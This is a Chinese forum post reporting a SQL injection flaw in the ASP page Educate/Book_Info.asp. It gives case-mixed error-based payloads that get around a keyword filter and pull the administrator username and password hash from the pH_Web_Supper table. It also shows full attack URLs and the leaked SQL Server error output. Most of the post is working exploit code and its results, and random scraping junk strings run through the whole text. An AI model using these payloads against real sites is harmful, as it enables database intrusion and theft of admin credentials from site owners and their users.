漏洞出现在Educate/Book_Info.asp
3 l, ?& V* g4 O7 [( N4 ^
% J1 E- B8 t( o- p# J' S" f此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
( ^1 @+ k# w! Z7 L+ Q) X) ~ 9 `' l$ F. t, S
exp:如下# }) k% n5 N+ z
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
8 S& m4 Z# m' p查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
. r2 g0 B/ z8 ]0 d i% N8 r
6 z7 Q, E* b m Thttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
) k- H* b5 E9 i7 z R/ y # R+ _' u% u& K7 j+ g, x7 x1 N* [
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
. Y! d4 U; {; f , h* A6 [/ v. \& c
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。& v. r0 ]1 b* b" c( f) v R) f
' C$ @. U) v! r5 u- R' f# N
/Educate/Book_Info.asp,行 8
+ E0 t' ^! j" A& w( ^ `
" i- f3 r: [( R/ L, Shttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
$ h% j1 E8 b" ^; q6 `+ y
0 t, m( t: b( _9 _Microsoft OLE DB Provider for SQL Server 错误 '80040e07'2 p% B7 E' H$ W7 K+ S
- P. s4 E% a2 Q# d4 p& v$ ?
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
: K0 b! y$ Y0 y: [( b " a7 j$ C6 b' L" I& {& i- K
/Educate/Book_Info.asp,行 82 z2 o9 E9 m# M) x5 a; H
|
发表于 2013-2-16 21:44:16
收藏
支持
反对